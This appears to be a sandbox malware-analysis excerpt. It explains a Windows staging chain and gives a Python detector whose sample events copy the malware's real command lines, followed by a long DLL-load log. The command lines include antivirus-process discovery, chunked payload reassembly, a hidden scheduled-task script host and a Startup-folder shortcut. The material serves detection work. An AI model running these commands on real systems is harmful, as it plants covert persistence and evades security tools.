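The ADFoyxP.exe branch of the process list above is a self-contained staging script: expand.exe turns Go.pub into Go.pub.bat, tasklist is piped into findstr twice to look for security-product processes (opssvc, wrsa, bdservicehost, AvastUI, AVGUI, nsWscSvc, ekrn, SophosHealth), extrac32 unpacks Really.pub, a renamed executable (Seat.com) is reassembled with copy /b from eleven chunks and its argument from 36 more, and persistence is then set through a schtasks entry that runs wscript //B on TradeHub.js every five minutes plus a TradeHub.url dropped in the Startup folder. The detector below is an added example written for this page, not Joe Sandbox's signature logic; it runs five rules over (parent image, child image, command line) events. SAMPLE_EVENTS is a constructed list copied from the process-creation lines (the second copy /b is shortened to four chunks) with two constructed benign events appended as controls, and the rule names, the three-chunk threshold and the choice to key parents by image path rather than PID are this example's own.

```python
"""Detection logic for the staging chain in the process list: AV discovery via
tasklist | findstr, payload rebuilt with 'copy /b' from many chunks, LOLBin
unpacking (expand/extrac32 on non-.cab inputs), a scheduled task running a
hidden script host and an [InternetShortcut] written to the Startup folder.
Added example, not part of the Joe Sandbox report: rule names and thresholds
are this example's own; SAMPLE_EVENTS is a constructed (parent, child, command
line) list taken from the report's process-creation lines plus benign controls."""
import re
from collections import Counter, defaultdict

AV_PROCESS_NAMES = {"opssvc", "wrsa", "bdservicehost", "avastui", "avgui",
                    "nswscsvc", "ekrn", "sophoshealth"}      # names the sample greps for
COPY_B = re.compile(r"copy\s+/b\s+(.+)$", re.I)
SCRIPT_HOST_BG = re.compile(r"\b[wc]script\b\s+//b", re.I)   # wscript //B / cscript //B
MIN_CHUNKS = 3                                               # fewer: ordinary copy /b use


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _hit(rule, parent, child, detail):
    return {"rule": rule, "parent": basename(parent), "child": basename(child), "detail": detail}


def analyze(events):
    """events: iterable of (parent_image, child_image, command_line) in creation order.
    Parents are keyed by image path here (assumption); real telemetry would use the PID."""
    findings, children_of = [], defaultdict(set)
    for parent, child, cmdline in events:
        kid = basename(child)
        children_of[parent].add(kid)
        low = cmdline.lower()
        words = set(re.findall(r"[a-z0-9_.-]+", low))

        # 1. tasklist output grepped for security-product process names under the same parent
        if kid == "findstr.exe" and "tasklist.exe" in children_of[parent]:
            named = sorted(words & AV_PROCESS_NAMES)
            if named:
                findings.append(_hit("av_process_discovery", parent, child, ", ".join(named)))

        # 2. many chunks concatenated into one file (payload reassembly)
        m = COPY_B.search(cmdline)
        if m:
            parts = [p.strip() for p in m.group(1).split(" + ")]
            parts[-1], _, dest = parts[-1].rpartition(" ")   # last token is the destination
            if len(parts) >= MIN_CHUNKS:
                findings.append(_hit("binary_concat_to_payload", parent, child,
                                     "%d chunks -> %s" % (len(parts), dest)))

        # 3. expand/extrac32 used on an input that is not named like a cabinet
        if kid in ("expand.exe", "extrac32.exe"):
            operands = [t for t in cmdline.split()[1:] if not t.startswith("/")]
            if operands and not operands[0].lower().endswith((".cab", ".cab_")):
                findings.append(_hit("lolbin_archive_unpack", parent, child, " ".join(operands)))

        # 4. scheduled task whose action is a hidden script host
        if kid == "schtasks.exe" and "/create" in low and SCRIPT_HOST_BG.search(cmdline):
            findings.append(_hit("scheduled_task_script_host", parent, child, cmdline))

        # 5. .url written into the per-user Startup folder
        if "[internetshortcut]" in low and "\\start menu\\programs\\startup\\" in low:
            findings.append(_hit("startup_folder_url", parent, child, cmdline))
    return findings


def rule_counts(findings):
    return Counter(f["rule"] for f in findings)


CMD = r"C:\Windows\SysWOW64\cmd.exe"
SEAT = r"C:\Users\user\AppData\Local\Temp\353090\Seat.com"
SAMPLE_EVENTS = [  # constructed from the report's process-creation lines; second copy /b shortened
    (r"C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe", CMD,
     r'"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat'),
    (CMD, r"C:\Windows\SysWOW64\expand.exe", "expand Go.pub Go.pub.bat"),
    (CMD, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    (CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "opssvc wrsa"'),
    (CMD, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    (CMD, r"C:\Windows\SysWOW64\findstr.exe",
     'findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"'),
    (CMD, CMD, "cmd /c md 353090"),
    (CMD, r"C:\Windows\SysWOW64\extrac32.exe", "extrac32 /Y /E Really.pub"),
    (CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "posted" Good'),
    (CMD, CMD, r"cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane"
               r" + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com"),
    (CMD, CMD, r"cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Poem.pub m"),
    (CMD, SEAT, "Seat.com m"),
    (SEAT, CMD, r"""cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F"""),
    (CMD, r"C:\Windows\SysWOW64\schtasks.exe", r"""schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F"""),
    (SEAT, CMD, r"""cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit"""),
    # constructed benign controls: an ordinary two-part copy /b and a plain findstr must not fire
    (r"C:\Windows\explorer.exe", CMD, "cmd /c copy /b part1.txt + part2.txt merged.txt"),
    (CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "error" build.log'),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print("%-28s %-12s -> %-12s %s" % (f["rule"], f["parent"], f["child"], f["detail"][:70]))
```

Run on the sample list this yields eight findings (two AV-discovery, two concatenation, two unpack, one scheduled task, one Startup .url) and nothing for the two benign controls; on real EDR data the same rules should be keyed by process ID and the copy /b threshold tuned to the environment.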
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: aclayers.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: sfc.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: feclient.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: advpack.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: feclient.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Section loaded: advpack.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Section loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: explorerframe.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: portabledeviceapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: pla.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: pdh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: tdh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: shdocvw.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: duilib_u.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: msvcp140.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: dbghelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: pla.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: pdh.dll
